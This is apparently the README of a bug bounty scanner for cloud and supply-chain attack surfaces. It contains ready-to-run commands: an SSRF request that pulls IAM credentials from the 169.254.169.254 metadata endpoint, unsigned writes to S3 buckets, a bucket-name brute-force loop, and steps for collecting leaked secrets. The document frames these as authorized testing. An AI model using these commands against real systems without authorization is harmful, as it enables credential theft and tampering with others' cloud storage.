# cloud.sh — Cloud & Supply Chain Scanner

8-phase scanner for cloud infrastructure and supply chain attack surfaces: AWS/Azure/GCP enumeration, S3/Blob bucket discovery, metadata SSRF, serverless function hunting, JS dependency analysis, and dependency confusion.


## Features

### 8-Phase Pipeline

| Phase | Script | What It Tests |
|-------|--------|---------------|
| 1 | `cl_cloud_enum.sh` | AWS, Azure, GCP subdomain enumeration by company keyword |
| 2 | `cl_bucket_scan.sh` | S3, Azure Blob, GCS bucket discovery — open read/write access |
| 3 | `cl_metadata_ssrf.sh` | Metadata endpoint SSRF (`169.254.169.254`, `fd00:ec2::254`) for IAM token theft |
| 4 | `cl_serverless.sh` | Lambda, Azure Functions, Cloud Run endpoint discovery |
| 5 | `cl_js_audit.sh` | JavaScript file analysis for cloud credentials, internal endpoints, hardcoded secrets |
| 6 | `cl_dep_confusion.sh` | Dependency confusion/typosquatting in `package.json`, `requirements.txt` |
| 7 | `cl_sri_check.sh` | Missing Subresource Integrity on CDN-served JS/CSS |
| 8 | `cl_cloud_secrets.sh` | Cloud keys, IAM credentials, API tokens in HTML, JS, headers |

### Quality

- **Resume support** — phase-level checkpointing
- **VRT-aware output** — findings categorized P1–P5
- **Keyword-driven** — Phases 1 & 4 enumerate `{keyword}-prod`, `{keyword}-dev`, etc.
- **Report generation** — Bugcrowd/H1-ready Markdown with evidence
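The resume feature can be pictured as a thin wrapper around a status file. A minimal sketch, assuming `phase_status.txt` holds one `name:done` marker per completed phase (the real cloud.sh bookkeeping may differ):

```shell
# Hypothetical phase-level checkpointing: a phase is skipped when
# phase_status.txt already records it as done.
STATUS=./phase_status.txt
touch "$STATUS"

run_phase() {
  local name="$1"; shift
  if grep -qx "$name:done" "$STATUS"; then
    echo "[resume] $name already complete, skipping"
    return 0
  fi
  "$@" && echo "$name:done" >> "$STATUS"
}

run_phase cl_bucket_scan true   # 'true' stands in for the real phase script
run_phase cl_bucket_scan true   # on a resumed run, this call is skipped
```

Because the marker is only appended after the phase command exits 0, a phase that crashed mid-way is re-run in full on resume.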

## Requirements

### Required

```shell
sudo pacman -S curl jq
```

### Recommended

```shell
sudo pacman -S python3 gau katana
pip install trufflehog  # or: sudo pacman -S trufflehog
```

### Optional API Keys

```shell
export SHODAN_API_KEY="your_key"    # Cloud IP enumeration
export GITHUB_TOKEN="your_token"    # GitHub search for leaked cloud creds
```
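Before a long run it can be worth sanity-checking that a key is actually valid; Shodan's `/api-info` endpoint returns plan details for a valid key (the fallback message below is this sketch's, not cloud.sh output):

```shell
# Verify the Shodan key works before relying on it for enumeration.
if [ -n "$SHODAN_API_KEY" ]; then
  curl -s "https://api.shodan.io/api-info?key=$SHODAN_API_KEY" | jq .
else
  echo "SHODAN_API_KEY not set"
fi
```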

## Installation

```shell
git clone https://github.com/Sharon-Needles/cloud
cd cloud
chmod +x cloud.sh scripts/*.sh

# Global symlink (optional)
sudo ln -s "$(pwd)/cloud.sh" /usr/local/bin/cloud
```

## Quick Start

### Interactive Mode

```shell
./cloud.sh
```

### CLI Mode — Full Scan

```shell
./cloud.sh --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd
```

The `--keyword` flag drives bucket and serverless enumeration (it tries `acme-prod`, `acme-dev`, `acme-staging`, and so on).
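The permutation logic can be sketched like this; the suffix list and name shapes are assumptions for illustration, not taken from `cl_bucket_scan.sh`:

```shell
# Generate bucket/function name candidates from a company keyword.
gen_candidates() {
  local kw="$1"
  local suffixes=(prod dev staging backup assets static uploads logs)
  local s
  printf '%s\n' "$kw"                 # bare keyword
  for s in "${suffixes[@]}"; do
    printf '%s-%s\n' "$kw" "$s"       # acme-prod
    printf '%s%s\n'  "$kw" "$s"       # acmeprod
    printf '%s.%s\n' "$kw" "$s"       # acme.prod (dots are valid in S3 names)
  done
}

gen_candidates acme | sort -u
```

Each candidate is then probed against the provider endpoints (e.g. `https://<name>.s3.amazonaws.com/`) to see whether it resolves and what status code comes back.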

### Resume

```shell
./cloud.sh --resume ./hunts/Acme_CLOUD_20260423_120000
```

### Single Phase

```shell
./scripts/cl_bucket_scan.sh --domains scope.txt --keyword acme -o ./bucket_results
./scripts/cl_metadata_ssrf.sh -d app.example.com -o ./ssrf_results
./scripts/cl_js_audit.sh --domains scope.txt -o ./js_results
```

## Usage

```text
cloud.sh [OPTIONS]

Modes:
  (no args)               Interactive
  --target NAME           Target program name
  --domains FILE          File with domains (one per line)
  --keyword KEYWORD       Company keyword for bucket/serverless enumeration
  --platform PLATFORM     bugcrowd | hackerone | other
  --out DIR               Output directory (default: ./hunts)
  --resume PATH           Resume from previous run

Options:
  -t, --threads N         Concurrency (default: 30)
  -h, --help              Show help
  --version               Print version
```

## Examples

Full cloud scan with keyword:

```shell
cloud --target "Acme Corp" --domains scope.txt --keyword acme --platform bugcrowd
```

Bucket scan only:

```shell
./scripts/cl_bucket_scan.sh --domains scope.txt --keyword "acme" -o ./bucket_out
```

JS credential scan:

```shell
./scripts/cl_js_audit.sh --domains scope.txt -o ./js_out
```

## Output Structure

```text
Acme_Corp_CLOUD_20260423_120000/
├── manifest.json
├── phase_status.txt
├── timeline.log
│
├── cl_cloud_enum/
│   ├── aws_domains.txt            # *.amazonaws.com, *.s3.amazonaws.com
│   ├── azure_domains.txt          # *.azurewebsites.net, *.blob.core.windows.net
│   ├── gcp_domains.txt            # *.appspot.com, *.storage.googleapis.com
│   └── cloud_live.txt             # Responding cloud endpoints
│
├── cl_bucket_scan/
│   ├── s3_candidates.txt          # S3 bucket names tried
│   ├── s3_open_read.txt           # Publicly readable buckets
│   ├── s3_open_write.txt          # Publicly writable buckets (P1!)
│   ├── azure_blobs.txt            # Azure Blob results
│   └── gcs_buckets.txt            # GCS public buckets
│
├── cl_metadata_ssrf/
│   ├── ssrf_candidates.txt        # Endpoints that fetch remote URLs
│   ├── metadata_responses.txt     # 169.254.169.254 responses
│   └── iam_tokens.txt             # Extracted IAM credentials (P1!)
│
├── cl_serverless/
│   ├── lambda_endpoints.txt       # Lambda function URLs
│   ├── azure_functions.txt        # Azure Function endpoints
│   └── cloud_run.txt              # GCP Cloud Run services
│
├── cl_js_audit/
│   ├── js_files.txt               # JS files audited
│   ├── hardcoded_creds.txt        # Potential credentials in JS
│   └── internal_endpoints.txt     # Internal API URLs from JS
│
├── cl_dep_confusion/
│   ├── package_files.txt          # package.json, requirements.txt found
│   ├── internal_packages.txt      # Internal package names identified
│   └── confusion_candidates.txt   # Packages vulnerable to dep confusion
│
├── cl_sri_check/
│   └── missing_sri.txt            # Third-party scripts without SRI
│
├── cl_cloud_secrets/
│   ├── secret_candidates.txt      # All potential secrets found
│   └── validated_secrets.txt      # Confirmed active credentials
│
├── findings.txt
├── [SUBMIT:P1].txt               # Open-write buckets, leaked IAM tokens
├── [SUBMIT:P2].txt               # Open-read buckets with sensitive data
├── [SUBMIT:P3].txt               # Unauthenticated serverless endpoints
├── [REVIEW:P4].txt               # Manual review needed
├── [DO_NOT_SUBMIT:P5].txt        # SRI missing (without CDN compromise chain)
└── report.md
```

## High-Value Finding Patterns

### Open-Write S3 Bucket (P1)

```shell
aws s3 ls s3://acme-backup/ --no-sign-request
aws s3 cp test.txt s3://acme-backup/ --no-sign-request
```

If the write succeeds, this is a P1 critical: an attacker can backdoor static assets or host phishing content. Remove your test object afterwards.

### Metadata SSRF → IAM Token (P1)

Find a webhook or URL-fetching parameter and point it at `http://169.254.169.254/latest/meta-data/iam/security-credentials/`:

```shell
curl "https://app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```
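The listing response returns role names; each role's temporary credentials live one path segment deeper. A sketch of the follow-up, where `app.example.com` and the `fetch` parameter are placeholders and the live requests only run with `RUN_LIVE=1` (set it only against an authorized target):

```shell
# Documented IMDSv1 path for IAM role credentials.
MD="http://169.254.169.254/latest/meta-data/iam/security-credentials"

# Hypothetical helper: credential URL for a given role name.
cred_url() { printf '%s/%s\n' "$MD" "$1"; }

if [ "${RUN_LIVE:-0}" = 1 ]; then
  role=$(curl -s "https://app.example.com/fetch?url=$MD/")
  curl -s "https://app.example.com/fetch?url=$(cred_url "$role")"
fi
```

If the SSRF works, the second response contains `AccessKeyId`, `SecretAccessKey`, and `Token`: the P1 evidence that lands in `iam_tokens.txt`.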

### Open-Read Bucket with Sensitive Files (P2)

The bucket is readable but not writable. If it contains backups, config files, credentials, or PII, report it as P2. If it contains only public assets, it is P5 (not reportable).
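Triage can be partly automated by grepping the listing for risky extensions. In this sketch, `listing.txt` stands in for the output of `aws s3 ls s3://<bucket>/ --recursive --no-sign-request`, and both the sample lines and the extension list are illustrative:

```shell
# Stand-in for a real recursive bucket listing.
printf '%s\n' \
  '2026-04-23 12:00:00     1024 db/users.sql' \
  '2026-04-23 12:00:01     2048 img/logo.png' \
  '2026-04-23 12:00:02      512 conf/.env' > listing.txt

# Flag keys whose extension suggests backups, configs, or credentials.
grep -Ei '\.(sql|bak|env|pem|key|p12|zip|csv)$' listing.txt
```

Anything the grep surfaces still needs a manual look to confirm it actually contains sensitive data before you claim P2.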

### Dependency Confusion (P2–P3)

Internal package names (e.g., `acme-internal-lib`) are referenced in manifests but do not exist on npm/PyPI. An attacker who registers such a name on the public registry can get their version installed by any CI/CD system that resolves the name publicly.
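Whether a name is actually claimable can be checked against both public registries. A sketch, using the documented npm and PyPI metadata endpoints (`check_public` is a hypothetical helper, not part of cloud.sh):

```shell
# 404 from both registries means the name is publicly unregistered --
# a dependency-confusion candidate.
check_public() {
  local pkg="$1" npm pypi
  npm=$(curl -s -o /dev/null -w '%{http_code}' "https://registry.npmjs.org/$pkg")
  pypi=$(curl -s -o /dev/null -w '%{http_code}' "https://pypi.org/pypi/$pkg/json")
  if [ "$npm" = 404 ] && [ "$pypi" = 404 ]; then
    echo "$pkg CLAIMABLE (npm=$npm pypi=$pypi)"
  else
    echo "$pkg taken/unknown (npm=$npm pypi=$pypi)"
  fi
}

# Feed it Phase 6 output:
# while read -r p; do check_public "$p"; done < cl_dep_confusion/internal_packages.txt
```

Never actually publish a proof-of-concept package with executable payloads unless the program's policy explicitly allows it.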

### SRI Missing (P5 — Never Submit Alone)

`<script src="https://cdn.example.com/lib.js">` without `integrity="sha256-…"`. Only reportable if you can demonstrate a CDN compromise that would deliver malicious JS.
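For remediation evidence, the expected `integrity` value can be computed from a pinned copy of the asset with openssl. The file content below is a stand-in for whatever you fetched from the CDN:

```shell
# Stand-in for the CDN-served file under review.
printf 'console.log("demo");\n' > lib.js

# SRI value = base64 of the raw (binary) digest, prefixed with the algorithm.
hash=$(openssl dgst -sha256 -binary lib.js | openssl base64 -A)
printf 'integrity="sha256-%s"\n' "$hash"
```

Browsers also accept `sha384` and `sha512` digests; whichever is used, the hash must match the exact bytes the CDN serves, so any upstream file change requires regenerating it.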


## Integration with hunt.sh

```shell
# Use hunt.sh JS secrets output as cloud.sh input
grep -h "amazonaws\|azurewebsites\|appspot" ./hunts/Target_*/js_secrets.txt | \
  awk '{print $1}' | sort -u > cloud_endpoints.txt

cloud --target "Target" --domains cloud_endpoints.txt --keyword "target" --platform bugcrowd
```

## Troubleshooting

### "No buckets found"

Try more keyword variants manually:

```shell
for kw in acme acme-corp acmecorp acme-prod acme-dev acme-staging acme-backup; do
    aws s3 ls "s3://$kw/" --no-sign-request 2>&1 | grep -v "NoSuchBucket\|AccessDenied" && echo "$kw FOUND"
done
```

### SSRF check times out

Some URL fetchers have server-side timeouts. Test with a short client-side timeout:

```shell
curl -sk "https://app.example.com/fetch?url=http://169.254.169.254/" -m 5
```

### JS audit finds too many false positives

Filter with:

```shell
grep -i "key\|secret\|token\|password" ./cl_js_audit/hardcoded_creds.txt | \
  grep -iv "test\|example\|dummy\|placeholder"
```

## Tested On

- **OS:** BlackArch Linux, Ubuntu 22.04
- **Bash:** 5.x
- **Dependencies:** curl, jq (required); Python 3, AWS CLI (recommended)

## License

MIT


## Disclaimer

Only test authorized targets. Accessing open buckets without permission may be illegal even when they are publicly accessible. Only interact with buckets that are clearly in scope of an active bug bounty program.
